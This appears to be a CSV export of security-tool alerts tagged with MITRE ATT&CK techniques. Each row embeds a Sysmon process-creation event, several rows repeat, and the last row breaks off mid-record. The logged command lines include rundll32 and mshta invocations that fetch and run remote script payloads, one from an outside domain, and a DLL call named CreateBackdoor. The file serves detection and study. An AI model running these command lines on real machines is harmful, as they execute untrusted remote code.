[T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
</TimeCreated>
<EventRecordID>424175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
<Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ProcessId"">7504</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ParentProcessId"">9116</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-05T22:28:20.530062Z"">
</TimeCreated>
<EventRecordID>2164913</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""6708"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-05 22:28:20.529</Data>
<Data Name=""ProcessGuid"">00247C92-9E04-5F7B-0000-0010CF98272C</Data>
<Data Name=""ProcessId"">12876</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
<Data Name=""LogonId"">0x391e334</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-9E03-5F7B-0000-0010A645272C</Data>
<Data Name=""ParentProcessId"">20228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mmc.exe&quot; WF.msc</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:45.491710Z"">
</TimeCreated>
<EventRecordID>6177</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:45.437</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010122D0C00</Data>
<Data Name=""ProcessId"">1636</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
<Data Name=""ParentProcessId"">3876</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
</TimeCreated>
<EventRecordID>424175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
<Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ProcessId"">7504</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ParentProcessId"">9116</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:18.583990Z"">
</TimeCreated>
<EventRecordID>4904</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:18.451</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
<Data Name=""ParentProcessId"">776</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
</TimeCreated>
<EventRecordID>243527</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
<Data Name=""ProcessId"">8076</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
</TimeCreated>
<EventRecordID>424175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
<Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ProcessId"">7504</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ParentProcessId"">9116</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ParentProcessId"">1532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:18.583990Z"">
</TimeCreated>
<EventRecordID>4904</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:18.451</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
<Data Name=""ParentProcessId"">776</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
</TimeCreated>
<EventRecordID>243527</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
<Data Name=""ProcessId"">8076</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
